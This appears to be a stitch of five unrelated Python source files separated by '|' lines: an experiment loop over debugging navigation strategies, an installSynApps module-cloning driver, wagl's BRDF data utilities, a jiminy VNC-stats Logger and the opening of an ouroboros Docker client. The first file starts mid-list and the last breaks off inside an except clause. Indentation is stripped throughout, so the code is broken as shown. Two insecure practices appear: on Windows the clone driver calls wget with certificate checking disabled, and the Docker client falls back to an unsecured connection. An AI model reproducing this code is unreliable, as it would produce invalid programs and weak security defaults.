'experiments/selected_mutants/basic_binary_tree.mutant.56', # 07-basic_binary_tree
# Skipping 08-edit_distance
# Skipping 09-dijkstra_algorithm
# Skipping 10-caesar_cipher
# Skipping 11-caesar_cipher
# 'experiments/selected_mutants/basic_maths.mutant.117', stuck in infinite loop
'experiments/selected_mutants/merge_sort.mutant.3', # 13-merge_sort
# 'experiments/selected_mutants/math_parser.mutant.213', # 16-math_parser
'experiments/selected_mutants/merge_intervals.mutant.206', # 17-merge_intervals
'experiments/selected_mutants/binary_search.mutant.15',
# 'experiments/selected_mutants/permute.mutant.119', # 20-permute
'experiments/selected_mutants/lcs.mutant.101', # 21-longest_common_subsequence
'experiments/selected_mutants/lis.mutant.88', # 23-longest_increasing_subsequence
#'experiments/selected_mutants/heapsort.mutant.151',
#'experiments/selected_mutants/quicksort.mutant.5'
]
for subject in subjects:
print(datetime.now().strftime('%Y_%m_%d %H-%M-%S.%f'))
print("Subject: "+subject)
NOW2_SQLITE_PATH = "{}/.noworkflow/db.sqlite".format(subject)
ANSWER_FILE_PATH = "{}/answers.json".format(subject)
CURSOR = sqlite3.connect(NOW2_SQLITE_PATH).cursor()
creator = ExecTreeCreator(CURSOR)
#################################
# FIRST EXPERIMENT
# COMPARING NAVIGATION STRATEGIES WITHOUT PROVENANCE
navs = [SingleStepping, TopDown, HeaviestFirst, DivideAndQuery]
if RUN_1ST_EXPERIMENT:
for nav in navs:
exec_tree = None
exec_tree = creator.create_exec_tree()
nav_instance = nav(exec_tree, True, ANSWER_FILE_PATH)
nav_instance.navigate()
print(nav_instance.__class__.__name__+" experiment finished: " +
str(nav_instance.sequence_num)+" steps.")
if GENERATE_TREES:
vis = Visualization(exec_tree)
vis.view_exec_tree(str(id(exec_tree)))
#################################
# SECOND EXPERIMENT
# COMPARING NAVIGATION STRATEGIES WITH PROVENANCE PRUNE, BUT WITHOUT ASKING WHICH OUTPUT DATA IS WRONG
navs = [SingleStepping, TopDown, HeaviestFirst, DivideAndQuery]
if RUN_2ND_EXPERIMENT:
for nav in navs:
exec_tree = None
exec_tree = creator.create_exec_tree()
prov = ProvenanceEnhancement(exec_tree, CURSOR)
prov.enhance_all()
nav_instance = nav(exec_tree, True, ANSWER_FILE_PATH)
nav_instance.provenance_prune()
nav_instance.navigate()
print(nav_instance.__class__.__name__+" experiment finished: " +
str(nav_instance.sequence_num)+" steps.")
if GENERATE_TREES:
vis = Visualization(exec_tree)
vis.view_exec_tree(str(id(exec_tree)))
#################################
# THIRD EXPERIMENT
# COMPARING NAVIGATION STRATEGIES WITH PROVENANCE PRUNE, ASKING WHICH OUTPUT DATA IS WRONG
navs = [SingleStepping, TopDown, HeaviestFirst, DivideAndQuery]
if RUN_3RD_EXPERIMENT:
for nav in navs:
exec_tree = None
exec_tree = creator.create_exec_tree()
nav_instance = nav(exec_tree, True, ANSWER_FILE_PATH)
prov = ProvenanceEnhancement(exec_tree, CURSOR)
wrong_node_ev = exec_tree.search_by_ev_id(
nav_instance.wrong_node_id)
prov.enhance(wrong_node_ev)
nav_instance.provenance_prune()
nav_instance.navigate()
print(nav_instance.__class__.__name__+" experiment finished: " +
str(nav_instance.sequence_num)+" steps.")
if GENERATE_TREES:
vis = Visualization(exec_tree)
vis.view_exec_tree(str(id(exec_tree)))
|
"""Driver class for cloning all of the install modules
The clone driver uses git, wget, tar and zip to download all modules specified in install configuration
to the local machine.
"""
import os
from subprocess import Popen, PIPE
import shutil
from sys import platform
import installSynApps.DataModel.install_config as IC
import installSynApps.DataModel.install_module as IM
import installSynApps.IO.logger as LOG
class CloneDriver:
"""Class responsible for cloning and checking out all of the modules described in a given InstallConfiguration
Attributes
----------
recursive_modules : List of str
list of module names that need to be cloned recursively
submodule_list : List of str
list of module names that have submodules that must be initialized
submodule_names : Dict of str -> str
pairings of module names to submodules that must be initialized
install_config : InstallConfiguration
contains all necessary install configuration information including list of modules
Methods
-------
clone_module(module : InstallModule, recursive=False)
Function responsible for cloning each module into the appropriate location
checkout_module(module : InstallModule)
Function that checks out module's tag version if non-master version is specified
update_submodules()
Function that updates all submodules for git repos that require it
cleanup_modules()
Function that removes any module directories that exist but are not required
clone_and_checkout()
Top level function that calls the other functions on each module in self.install_config.get_module_list()
"""
def __init__(self, install_config):
"""Constructor for the CloneDriver class
"""
self.recursive_modules = ["EPICS_BASE"]
self.submodule_list = []
self.submodule_names = {}
self.install_config = install_config
def clone_module(self, module, recursive = False):
"""Function responsible for cloning each module into the appropriate location
First checks if the module uses git or a download, and whether it needs to be recursive
then, uses the information in the module object along with subprocess commands to clone the module.
Parameters
----------
module : InstallModule
InstallModule currently being cloned
recursive=False
Flag that decides if git clone should be done recursively
"""
LOG.debug('Cloning module {}'.format(module.name))
if isinstance(module, IM.InstallModule):
if module.abs_path != None:
ret = -1
if os.path.exists(module.abs_path):
shutil.rmtree(module.abs_path)
if not recursive and module.url_type == "GIT_URL":
command = "git clone {} {}".format(module.url + module.repository, module.abs_path)
elif recursive and module.url_type == "GIT_URL":
command = "git clone --recursive {} {}".format(module.url + module.repository, module.abs_path)
elif module.url_type == "WGET_URL":
if platform == "win32":
command = "wget --no-check-certificate -P {} {}".format(module.abs_path, module.url + module.repository)
else:
command = 'wget -P {} {}'.format(module.abs_path, module.url + module.repository)
LOG.print_command(command)
proc = Popen(command.split(' '))
proc.wait()
ret = proc.returncode
if ret == 0:
LOG.write('Cloned module {} successfully.'.format(module.name))
else:
LOG.write('Failed to clone module {}.'.format(module.name))
return -1
if module.url_type == "WGET_URL":
if (module.repository.endswith(".tar.gz") or module.repository.endswith(".tgz")) and ret == 0:
command = "tar -xzf {} -C {} --strip-components=1".format(os.path.join(module.abs_path, module.repository), module.abs_path)
elif module.repository.endswith(".zip") and ret == 0:
command = "unzip {} -C {}".format(os.path.join(module.abs_path, module.repository), module.abs_path)
LOG.print_command(command)
proc = Popen(command.split(' '))
proc.wait()
ret = proc.returncode
if ret == 0:
LOG.write('Unpacked module {} successfully.'.format(module.name))
else:
LOG.write('Failed to unpack module {}.'.format(module.name))
if ret == 0:
return ret
return -1
return -2
return -3
def checkout_module(self, module):
"""Function responsible for checking out selected tagged versions of modules.
Parameters
----------
module : InstallModule
Module that is being checked out
Returns
-------
int
-3 if input was not an InstallModule, -2 if the absolute path is not known, -1 if checkout fails, 0 if success
"""
ret = -1
LOG.debug('Checking out version for module {}'.format(module.name))
if isinstance(module, IM.InstallModule):
if module.abs_path != None:
ret = 0
if module.version != "master" and module.url_type == "GIT_URL":
current_loc = os.getcwd()
os.chdir(module.abs_path)
command = "git checkout -q {}".format(module.version)
LOG.print_command(command)
proc = Popen(command.split(' '))
proc.wait()
ret = proc.returncode
os.chdir(current_loc)
if ret == 0:
LOG.write('Checked out version {}'.format(module.version))
else:
LOG.write('Checkout of version {} failed for module {}.'.format(module.version, module.name))
return ret
def update_submodule(self, module, submodule_name):
"""Function that updates submodules given that the input module is in the self.submodule_list array
Parameters
----------
module : InstallModule
module for which we must update submodules
submodule_name : str
name of submodule to update
"""
LOG.debug('Updating git submodules for {}'.format(module.name))
if isinstance(module, IM.InstallModule):
if module.abs_path != None:
submodule_path = module.abs_path + "/" + submodule_name
if os.path.exists(submodule_path):
LOG.print_command('git -C {} submodule init'.format(submodule_path))
p1 = Popen(["git", "-C", submodule_path, "submodule", "init"])
p1.wait()
ret1 = p1.returncode
if ret1 == 0:
LOG.debug('Submodules initialized for module {}.'.format(module.name))
else:
LOG.debug('Failed to initialize submodules for module {}.'.format(module.name))
LOG.print_command('git -C {} submodule update'.format(submodule_path))
p2 = Popen(["git", "-C", submodule_path, "submodule", "update"])
p2.wait()
ret2 = p2.returncode
if ret2 == 0:
LOG.debug('Submodules updated for module {}.'.format(module.name))
else:
LOG.debug('Failed to update submodules for module {}.'.format(module.name))
def cleanup_modules(self):
"""Function responsible for cleaning up directories that were not selected to clone
"""
if self.install_config != None and isinstance(self.install_config, IC.InstallConfiguration):
for module in self.install_config.modules:
if isinstance(module, IM.InstallModule):
if module.clone == "NO" and os.path.exists(module.abs_path):
LOG.debug('Removing unused repo {}'.format(module.name))
shutil.rmtree(module.abs_path)
def clone_and_checkout(self):
"""Top level function that clones and checks out all modules in the current install configuration.
Returns
-------
List of str
List of all modules that failed to be correctly cloned and checked out
"""
if isinstance(self.install_config, IC.InstallConfiguration):
failed_modules = []
for module in self.install_config.get_module_list():
if module.clone == "YES":
ret = 0
if module.name in self.recursive_modules:
ret = self.clone_module(module, recursive=True)
else:
ret = self.clone_module(module)
if ret < 0:
failed_modules.append(module.name)
else:
ret = self.checkout_module(module)
if ret < 0:
failed_modules.append(module.name)
else:
if module.name in self.submodule_list:
self.update_submodule(module, self.submodule_names[module.name])
self.cleanup_modules()
return failed_modules
return None
|
<reponame>Oceancolour-RG/wagl<filename>wagl/brdf.py<gh_stars>0
#!/usr/bin/env python
"""
BRDF data extraction utilities
------------------------------
The :ref:`nbar-algorithm-label` and :ref:`tc-algorithm-label` algorithms
require estimates of various atmospheric parameters, which are produced using
`MODTRAN <http://modtran5.com/>`_. MODTRAN, in turn, requires `BRDF
<http://en.wikipedia.org/wiki/Bidirectional_reflectance_distribution_function>`_
estimates. The estimates used in the ULA, are based on `MODIS
<http://modis.gsfc.nasa.gov/>`_ and are produced by CSIRO. For more
information, on how these are used, see :download:`this
<auxiliary/li_etal_2010_05422912.pdf>`.
`MODIS <http://modis.gsfc.nasa.gov/>`_, pre Feb 2001, MODIS data was not
available and an alternative method of deriving `BRDF
<http://en.wikipedia.org/wiki/Bidirectional_reflectance_distribution_function>`_
estimates is required.
"""
from __future__ import absolute_import, print_function
import datetime
import logging
import os
from os.path import join as pjoin
import numpy as np
import rasterio
from rasterio.features import rasterize
from rasterio.crs import CRS
import pyproj
import h5py
from osgeo import ogr
import shapely
import shapely.affinity
import shapely.geometry
from shapely.geometry import box
from shapely import wkt, ops
from wagl.constants import BrdfDirectionalParameters, BrdfModelParameters, BrdfTier
from wagl.hdf5 import H5CompressionFilter, VLEN_STRING
from wagl.metadata import current_h5_metadata
from wagl.data import read_subset
_LOG = logging.getLogger(__name__)
# Accurate BRDF requires both Terra and Aqua to be operating
# Aqua launched 2002-05-04, so we'll add a buffer for determining the start
# date for using definitive data.
DEFINITIVE_START_DATE = datetime.datetime(2002, 7, 1).date()
class BRDFLoaderError(Exception):
"""
BRDF Loader Error
"""
class BRDFLookupError(Exception):
"""
BRDF Lookup Error
"""
def _date_proximity(cmp_date, date_interpreter=lambda x: x):
"""_date_proximity providers a comparator for an interable
with an interpreter function. Used to find the closest item
in a list.
If two dates are equidistant return the most recent.
:param cmp_date: date to compare list against
:param date_interprater: function applied to the list to
transform items into dates
"""
def _proximity_comparator(date):
_date = date_interpreter(date)
return (
abs(_date - cmp_date),
-1 * _date.year,
-1 * _date.month,
-1 * _date.day
)
return _proximity_comparator
def get_brdf_dirs_modis(brdf_root, scene_date, pattern='%Y.%m.%d'):
"""
Get list of MODIS BRDF directories for the dataset.
:param brdf_root:
BRDF root directory.
:type brdf_root:
:py:class:`str`
:param scene_date:
Scene Date.
:type scene_date:
:py:class:`datetime.date`
:param pattern:
A string handed to strptime to interpret directory names into
observation dates for the brdf ancillary.
:type pattern:
:py:class:`str`
:return:
A string containing the closest matching BRDF directory.
"""
dirs = []
for dname in sorted(os.listdir(brdf_root)):
try:
dirs.append(datetime.datetime.strptime(dname, pattern).date())
except ValueError:
pass # Ignore directories that don't match specified pattern
return min(dirs, key=_date_proximity(scene_date)).strftime(pattern)
def get_brdf_dirs_fallback(brdf_root, scene_date):
"""
Get list of pre-MODIS BRDF directories for the dataset.
:param brdf_root:
BRDF root directory.
:type brdf_root:
:py:class:`str`
:param scene_date:
Scene Date.
:type scene_date:
:py:class:`datetime.date`
:return:
A string containing the closest matching BRDF directory.
"""
# Find the N (=n_dirs) BRDF directories with midpoints closest to the
# scene date.
# Pre-MODIS BRDF directories are named 'XXX' (day-of-year).
# Return a list of n_dirs directories to maintain compatibility with
# the NBAR code, even though we know that the nearest day-of-year
# database dir will contain usable data.
# Build list of dates for comparison
dir_dates = []
# Standardise names be prepended with leading zeros
for doy in sorted(os.listdir(brdf_root), key=lambda x: x.zfill(3)):
dir_dates.append((str(scene_date.year), doy))
# Add boundary entry for previous year
dir_dates.insert(0, (str(scene_date.year - 1), dir_dates[-1][1]))
# Add boundary entry for next year accounting for inserted entry
dir_dates.append((str(scene_date.year + 1), dir_dates[1][1]))
# Interpreter function
doy_intpr = lambda x: datetime.datetime.strptime(' '.join(x), '%Y %j').date()
# return directory name without year
return min(dir_dates, key=_date_proximity(scene_date, doy_intpr))[1]
def coord_transformer(src_crs, dst_crs):
"""
Coordinate transformation function between CRSs.
:param src_crs:
Source CRS.
:type src_crs:
:py:class:`rasterio.crs.CRS`
:param dst_crs:
Destination CRS.
:type dst_crs:
:py:class:`rasterio.crs.CRS`
:return:
A function that takes a point in the source CRS and returns the same
point expressed in the destination CRS.
"""
def crs_to_proj(crs):
return pyproj.Proj(**crs.to_dict())
def result(*args, **kwargs):
return pyproj.transform(crs_to_proj(src_crs), crs_to_proj(dst_crs), *args, **kwargs)
return result
class BrdfTileSummary:
"""
A lightweight class to represent the BRDF information gathered from a tile.
"""
def __init__(self, brdf_summaries, source_files):
self.brdf_summaries = brdf_summaries
self.source_files = source_files
@staticmethod
def empty():
""" When the tile is not inside the ROI. """
return BrdfTileSummary({key: {'sum': 0.0, 'count': 0} for key in BrdfModelParameters}, [])
def __add__(self, other):
""" Accumulate information from different tiles. """
def add(key):
this = self.brdf_summaries[key]
that = other.brdf_summaries[key]
return {'sum': this['sum'] + that['sum'], 'count': this['count'] + that['count']}
return BrdfTileSummary({key: add(key) for key in BrdfModelParameters},
self.source_files + other.source_files)
def mean(self):
""" Calculate the mean BRDF parameters. """
if all(self.brdf_summaries[key]['count'] == 0 for key in BrdfModelParameters):
# possibly over the ocean, so lambertian
return {key: dict(id=self.source_files, value=0.0)
for key in BrdfDirectionalParameters}
# ratio of spatial averages
averages = {key: self.brdf_summaries[key]['sum'] / self.brdf_summaries[key]['count']
for key in BrdfModelParameters}
bands = {BrdfDirectionalParameters.ALPHA_1: BrdfModelParameters.VOL,
BrdfDirectionalParameters.ALPHA_2: BrdfModelParameters.GEO}
return {key: dict(id=self.source_files,
value=averages[bands[key]] / averages[BrdfModelParameters.ISO])
for key in BrdfDirectionalParameters}
def valid_region(acquisition, mask_value=None):
"""
Return valid data region for input images based on mask value and input image path
"""
img = acquisition.data()
gbox = acquisition.gridded_geo_box()
crs = CRS.from_wkt(gbox.crs.ExportToWkt()).to_dict()
transform = gbox.transform.to_gdal()
if mask_value is None:
mask_value = acquisition.no_data
if mask_value is not None:
mask = img != mask_value
else:
mask = img != 0
shapes = rasterio.features.shapes(mask.astype('uint8'), mask=mask)
shape = ops.unary_union([shapely.geometry.shape(shape) for shape, val in shapes if val == 1])
# convex hull
geom = shape.convex_hull
# buffer by 1 pixel
geom = geom.buffer(1, join_style=3, cap_style=3)
# simplify with 1 pixel radius
geom = geom.simplify(1)
# intersect with image bounding box
geom = geom.intersection(shapely.geometry.box(0, 0, mask.shape[1], mask.shape[0]))
# transform from pixel space into CRS space
geom = shapely.affinity.affine_transform(
geom, (transform[1], transform[2], transform[4],
transform[5], transform[0], transform[3])
)
return geom, crs
def load_brdf_tile(src_poly, src_crs, fid, dataset_name, fid_mask):
"""
Summarize BRDF data from a single tile.
"""
ds = fid[dataset_name]
def segmentize_src_poly(length_scale):
src_poly_geom = ogr.CreateGeometryFromWkt(src_poly.wkt)
src_poly_geom.Segmentize(length_scale)
return wkt.loads(src_poly_geom.ExportToWkt())
ds_height, ds_width = ds.shape
dst_geotransform = rasterio.transform.Affine.from_gdal(*ds.attrs['geotransform'])
dst_crs = CRS.from_wkt(ds.attrs['crs_wkt'])
# assumes the length scales are the same (m)
dst_poly = ops.transform(coord_transformer(src_crs, dst_crs),
segmentize_src_poly(np.sqrt(np.abs(dst_geotransform.determinant))))
bound_poly = ops.transform(lambda x, y: dst_geotransform * (x, y), box(0., 0., ds_width, ds_height, ccw=False))
if not bound_poly.intersects(dst_poly):
return BrdfTileSummary.empty()
ocean_poly = ops.transform(lambda x, y: fid_mask.transform * (x, y), box(0., 0., fid_mask.width, fid_mask.height))
if not ocean_poly.intersects(dst_poly):
return BrdfTileSummary.empty()
# read ocean mask file for correspoing tile window
# land=1, ocean=0
bound_poly_coords = list(bound_poly.exterior.coords)[:4]
ocean_mask, _ = read_subset(fid_mask, *bound_poly_coords)
ocean_mask = ocean_mask.astype(bool)
# inside=1, outside=0
roi_mask = rasterize([(dst_poly, 1)], fill=0, out_shape=(ds_height, ds_width), transform=dst_geotransform)
roi_mask = roi_mask.astype(bool)
# both ocean_mask and mask shape should be same
if ocean_mask.shape != roi_mask.shape:
raise ValueError('ocean mask and ROI mask do not have the same shape')
if roi_mask.shape != ds.shape:
raise ValueError('BRDF dataset and ROI mask do not have the same shape')
roi_mask = roi_mask & ocean_mask
def layer_sum(param):
layer = ds[param][:, :]
common_mask = roi_mask & (layer != ds.attrs['_FillValue'])
layer = layer.astype('float32')
layer[~common_mask] = np.nan
layer = ds.attrs['scale_factor'] * (layer - ds.attrs['add_offset'])
return {'sum': np.nansum(layer), 'count': np.sum(common_mask)}
return BrdfTileSummary({param: layer_sum(param.value) for param in BrdfModelParameters},
[current_h5_metadata(fid)['id']])
def get_brdf_data(acquisition, brdf,
compression=H5CompressionFilter.LZF, filter_opts=None):
"""
Calculates the mean BRDF value for the given acquisition,
for each BRDF parameter ['geo', 'iso', 'vol'] that covers
the acquisition's extents.
:param acquisition:
An instance of an acquisitions object.
:param brdf:
A `dict` defined as either of the following:
* {'user': {<band-alias>: {'iso': <value>, 'vol': <value>, 'geo': <value>}, ...}}
* {'brdf_path': <path-to-BRDF>, 'brdf_fallback_path': <path-to-average-BRDF>,
'ocean_mask_path': <path-to-ocean-mask>}
Here <path-to-BRDF> is a string containing the full file system
path to your directory containing the ource BRDF files
The BRDF directories are assumed to be yyyy.mm.dd naming convention.
<path-to-average-BRDF> is a string containing the full file system
path to your directory containing the fallback BRDF data.
To be used for pre-MODIS and potentially post-MODIS acquisitions.
And <path-to-ocean-mask> is a string containing the full file system path
to your ocean mask file. To be used for masking ocean pixels from BRDF data
all acquisitions.
:param compression:
The compression filter to use.
Default is H5CompressionFilter.LZF
:filter_opts:
A dict of key value pairs available to the given configuration
instance of H5CompressionFilter. For example
H5CompressionFilter.LZF has the keywords *chunks* and *shuffle*
available.
Default is None, which will use the default settings for the
chosen H5CompressionFilter instance.
:return:
A `dict` with the keys:
* BrdfDirectionalParameters.ALPHA_1
* BrdfDirectionalParameters.ALPHA_2
Values for each BRDF Parameter are accessed via the key named
`value`.
:notes:
The keywords compression and filter_opts aren't used as we no
longer save the BRDF imagery. However, we may need to store
tables in future, therefore they can remain until we know
for sure they'll never be used.
"""
if 'user' in brdf:
# user-specified override
return {param: dict(data_source='BRDF', tier=BrdfTier.USER.name,
value=brdf['user'][acquisition.alias][param.value.lower()])
for param in BrdfDirectionalParameters}
brdf_primary_path = brdf['brdf_path']
brdf_secondary_path = brdf['brdf_fallback_path']
brdf_ocean_mask_path = brdf['ocean_mask_path']
# Get the date of acquisition
dt = acquisition.acquisition_datetime.date()
# Compare the scene date and MODIS BRDF start date to select the
# BRDF data root directory.
# Scene dates outside this range are to use the fallback data
brdf_dir_list = sorted(os.listdir(brdf_primary_path))
try:
brdf_dir_range = [brdf_dir_list[0], brdf_dir_list[-1]]
brdf_range = [datetime.date(*[int(x) for x in y.split('.')])
for y in brdf_dir_range]
fallback_brdf = (dt < DEFINITIVE_START_DATE or dt > brdf_range[1])
except IndexError:
fallback_brdf = True # use fallback data if all goes wrong
if fallback_brdf:
brdf_base_dir = brdf_secondary_path
brdf_dirs = get_brdf_dirs_fallback(brdf_base_dir, dt)
else:
brdf_base_dir = brdf_primary_path
brdf_dirs = get_brdf_dirs_modis(brdf_base_dir, dt)
# get all HDF files in the input dir
dbDir = pjoin(brdf_base_dir, brdf_dirs)
tile_list = [pjoin(folder, f)
for (folder, _, filelist) in os.walk(dbDir) for f in filelist if f.endswith(".h5")]
src_poly, src_crs = valid_region(acquisition)
src_crs = rasterio.crs.CRS(**src_crs)
brdf_datasets = acquisition.brdf_datasets
tally = {}
with rasterio.open(brdf_ocean_mask_path, 'r') as fid_mask:
for ds in brdf_datasets:
tally[ds] = BrdfTileSummary.empty()
for tile in tile_list:
with h5py.File(tile, 'r') as fid:
tally[ds] += load_brdf_tile(src_poly, src_crs, fid, ds, fid_mask)
tally[ds] = tally[ds].mean()
results = {param: dict(data_source='BRDF',
id=np.array(list({ds_id for ds in brdf_datasets for ds_id in tally[ds][param]['id']}),
dtype=VLEN_STRING),
value=np.mean([tally[ds][param]['value'] for ds in brdf_datasets]).item(),
tier=BrdfTier.FALLBACK_DATASET.name if fallback_brdf else BrdfTier.DEFINITIVE.name)
for param in BrdfDirectionalParameters}
return results
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
import logging
import numpy as np
import six
import time
from jiminy import vectorized
from jiminy.utils import display
logger = logging.getLogger(__name__)
extra_logger = logging.getLogger('jiminy.extra.'+__name__)
def stats(count):
flat = [e for vals in count for e in vals]
if len(flat) == 0:
return '(empty)'
s = '%0.1f±%0.1f' % (np.mean(flat), np.std(flat))
if six.PY2:
# There is not a great way to backport Unicode support to Python 2.
# We don't use it much, anyway. Easier just not to try.
s = s.replace('±', '+-')
return s
class Logger(vectorized.Wrapper):
metadata = {
'configure.required': True
}
def __init__(self, env, print_frequency=5):
super(Logger, self).__init__(env)
self.print_frequency = print_frequency
extra_logger.info('Running VNC environments with Logger set to print_frequency=%s. To change this, pass "print_frequency=k" or "print_frequency=None" to "env.configure".', self.print_frequency)
if self.n is not None:
self._clear_step_state()
self._last_step_time = None
def configure(self, **kwargs):
self.env.configure(**kwargs)
self._clear_step_state()
def _clear_step_state(self):
self.frames = 0
self.last_print = time.time()
# time between action being sent and processed
self.action_lag_n = [[] for _ in range(self.n)]
# time between observation being generated on the server and being passed to add_metadata
self.observation_lag_n = [[] for _ in range(self.n)]
# time between observation being passed to add_metadata and being returned to Logger
self.processing_lag = []
# time between observation being returned by Logger and then action being passed to Throttle
self.thinking_lag = []
self.vnc_updates_n = [[] for _ in range(self.n)]
self.vnc_bytes_n = [[] for _ in range(self.n)]
self.vnc_pixels_n = [[] for _ in range(self.n)]
self.reward_count_n = [[] for _ in range(self.n)]
self.reward_total_n = [[] for _ in range(self.n)]
self.reward_lag_n = [[] for _ in range(self.n)]
self.rewarder_message_lag_n = [[] for _ in range(self.n)]
def _step(self, action_n):
observation_n, reward_n, done_n, info = self.env.step(action_n)
if self.print_frequency is None:
return observation_n, reward_n, done_n, info
last_step_time = self._last_step_time
self._last_step_time = time.time()
# Printing
self.frames += 1
delta = time.time() - self.last_print
if delta > self.print_frequency:
fps = self.frames/delta
# Displayed independently
# action_lag = ','.join([diagnostics.display_timestamps_pair_max(action_lag) for action_lag in self.action_lag_n])
# observation_lag = ','.join([diagnostics.display_timestamps_pair_max(observation_lag) for observation_lag in self.observation_lag_n])
flat = False
# Smooshed together
action_lag, action_data = display.compute_timestamps_pair_max(self.action_lag_n, flat=flat)
observation_lag, observation_data = display.compute_timestamps_pair_max(self.observation_lag_n, flat=flat)
processing_lag, processing_data = display.compute_timestamps_sigma(self.processing_lag)
thinking_lag, thinking_data = display.compute_timestamps_sigma(self.thinking_lag)
reward_count = [sum(r) / delta for r in self.reward_count_n]
if flat and len(reward_count) > 0:
reward_count = np.mean(reward_count)
reward_total = [sum(r) / delta for r in self.reward_total_n]
if flat and len(reward_total) > 0:
reward_total = np.mean(reward_total)
reward_lag, reward_data = display.compute_timestamps_pair_max(self.reward_lag_n, flat=flat)
rewarder_message_lag, rewarder_message_data = display.compute_timestamps_pair_max(self.rewarder_message_lag_n, flat=flat)
vnc_updates_count = [sum(v) / delta for v in self.vnc_updates_n]
if flat and len(vnc_updates_count) > 0:
vnc_updates_count = np.mean(vnc_updates_count)
# Always aggregate these ones
if len(self.vnc_bytes_n) > 0:
vnc_bytes_count = np.sum(e for vnc_bytes in self.vnc_bytes_n for e in vnc_bytes) / delta
else:
vnc_bytes_count = None
if len(self.vnc_pixels_n) > 0:
vnc_pixels_count = np.sum(e for vnc_pixels in self.vnc_pixels_n for e in vnc_pixels) / delta
else:
vnc_pixels_count = None
reward_stats = stats(self.reward_count_n)
vnc_updates_stats = stats(self.vnc_updates_n)
vnc_bytes_stats = stats(self.vnc_bytes_n)
vnc_pixels_stats = stats(self.vnc_pixels_n)
reaction_time = []
for a, o in zip(action_data, observation_data):
try:
value = thinking_data['mean'] + processing_data['mean'] + a['mean'] + o['mean']
except KeyError:
reaction_time.append(None)
else:
reaction_time.append(display.display_timestamp(value))
log = []
for key, spec, value in [
('vnc_updates_ps', '%0.1f', vnc_updates_count),
('n', '%s', self.n),
('reaction_time', '%s', reaction_time),
('observation_lag', '%s', observation_lag),
('action_lag', '%s', action_lag),
('processing_lag', '%s', processing_lag),
('thinking_lag', '%s', thinking_lag),
('reward_ps', '%0.1f', reward_count),
('reward_total', '%0.1f', reward_total),
('vnc_bytes_ps[total]', '%0.1f', vnc_bytes_count),
('vnc_pixels_ps[total]', '%0.1f', vnc_pixels_count),
('reward_lag', '%s', reward_lag),
('rewarder_message_lag', '%s', rewarder_message_lag),
('fps', '%0.2f', fps),
]:
if value == None:
continue
if isinstance(value, list):
value = ','.join(spec % v for v in value)
else:
value = spec % value
log.append('%s=%s' % (key, value))
if not log:
log.append('(empty)')
if self.frames != 0:
logger.info('Stats for the past %.2fs: %s', delta, ' '.join(log))
self._clear_step_state()
# These are properties of the step rather than any one index
observation_available_at = info.get('throttle.observation.available_at')
if observation_available_at is not None:
# (approximate time that we're going to return -- i.e. now, assuming Logger is fast)
# - (time that the observation was passed to add_metadata)
self.processing_lag.append(self._last_step_time - observation_available_at)
action_available_at = info.get('throttle.action.available_at')
if action_available_at is not None and last_step_time is not None:
# (time that the action was generated) - (approximate time that we last returned)
self.thinking_lag.append(action_available_at - last_step_time)
# Saving of lags
for i, info_i in enumerate(info['n']):
observation_lag = info_i.get('stats.gauges.diagnostics.lag.observation')
if observation_lag is not None:
self.observation_lag_n[i].append(observation_lag)
action_lag = info_i.get('stats.gauges.diagnostics.lag.action')
if action_lag is not None:
self.action_lag_n[i].append(action_lag)
reward_count = info_i.get('reward.count')
if reward_count is not None:
self.reward_count_n[i].append(reward_count)
reward_total = reward_n[i]
if reward_total is not None:
self.reward_total_n[i].append(reward_total)
assert 'vnc.updates.n' not in info, 'Looks like you are using an old go-vncdriver. Please update to >=0.4.0: pip install --ignore-installed --no-cache-dir go-vncdriver'
vnc_updates = info_i.get('stats.vnc.updates.n')
if vnc_updates is not None:
self.vnc_updates_n[i].append(vnc_updates)
vnc_bytes = info_i.get('stats.vnc.updates.bytes')
if vnc_bytes is not None:
self.vnc_bytes_n[i].append(vnc_bytes)
vnc_pixels = info_i.get('stats.vnc.updates.pixels')
if vnc_pixels is not None:
self.vnc_pixels_n[i].append(vnc_pixels)
reward_lag = info_i.get('stats.gauges.diagnostics.lag.reward')
if reward_lag is not None:
self.reward_lag_n[i].append(reward_lag)
rewarder_message_lag = info_i.get('stats.gauges.diagnostics.lag.rewarder_message')
if rewarder_message_lag is not None:
self.rewarder_message_lag_n[i].append(rewarder_message_lag)
return observation_n, reward_n, done_n, info
|
<reponame>TaixMiguel/ouroboros<filename>pyouroboros/dockerclient.py
from time import sleep
from logging import getLogger
from docker import DockerClient, tls
from os.path import isdir, isfile, join
from docker.errors import DockerException, APIError, NotFound
from pyouroboros.helpers import set_properties, remove_sha_prefix, get_digest
class Docker(object):
def __init__(self, socket, config, data_manager, notification_manager):
self.config = config
self.socket = socket
self.client = self.connect()
self.data_manager = data_manager
self.logger = getLogger()
self.notification_manager = notification_manager
def connect(self):
if self.config.docker_tls:
try:
cert_paths = {
'cert_top_dir': '/etc/docker/certs.d/',
'clean_socket': self.socket.split('//')[1]
}
cert_paths['cert_dir'] = join(cert_paths['cert_top_dir'], cert_paths['clean_socket'])
cert_paths['cert_files'] = {
'client_cert': join(cert_paths['cert_dir'], 'client.cert'),
'client_key': join(cert_paths['cert_dir'], 'client.key'),
'ca_crt': join(cert_paths['cert_dir'], 'ca.crt')
}
if not isdir(cert_paths['cert_dir']):
self.logger.error('%s is not a valid cert folder', cert_paths['cert_dir'])
raise ValueError
for cert_file in cert_paths['cert_files'].values():
if not isfile(cert_file):
self.logger.error('%s does not exist', cert_file)
raise ValueError
tls_config = tls.TLSConfig(
ca_cert=cert_paths['cert_files']['ca_crt'],
verify=cert_paths['cert_files']['ca_crt'] if self.config.docker_tls_verify else False,
client_cert=(cert_paths['cert_files']['client_cert'], cert_paths['cert_files']['client_key'])
)
client = DockerClient(base_url=self.socket, tls=tls_config)
except ValueError:
self.logger.error('Invalid Docker TLS config for %s, reverting to unsecured', self.socket)
client = DockerClient(base_url=self.socket)
else:
client = DockerClient(base_url=self.socket)
return client
class BaseImageObject(object):
def __init__(self, docker_client):
self.docker = docker_client
self.logger = self.docker.logger
self.config = self.docker.config
self.client = self.docker.client
self.socket = self.docker.socket
self.data_manager = self.docker.data_manager
self.data_manager.total_updated[self.socket] = 0
self.notification_manager = self.docker.notification_manager
def _pull(self, tag):
"""Docker pull image tag"""
self.logger.debug('Checking tag: %s', tag)
try:
if self.config.dry_run:
# The authentication doesn't work with this call
# See bugs https://github.com/docker/docker-py/issues/2225
return self.client.images.get_registry_data(tag)
else:
if self.config.auth_json:
return_image = self.client.images.pull(tag, auth_config=self.config.auth_json)
else:
return_image = self.client.images.pull(tag)
return return_image
except APIError as e:
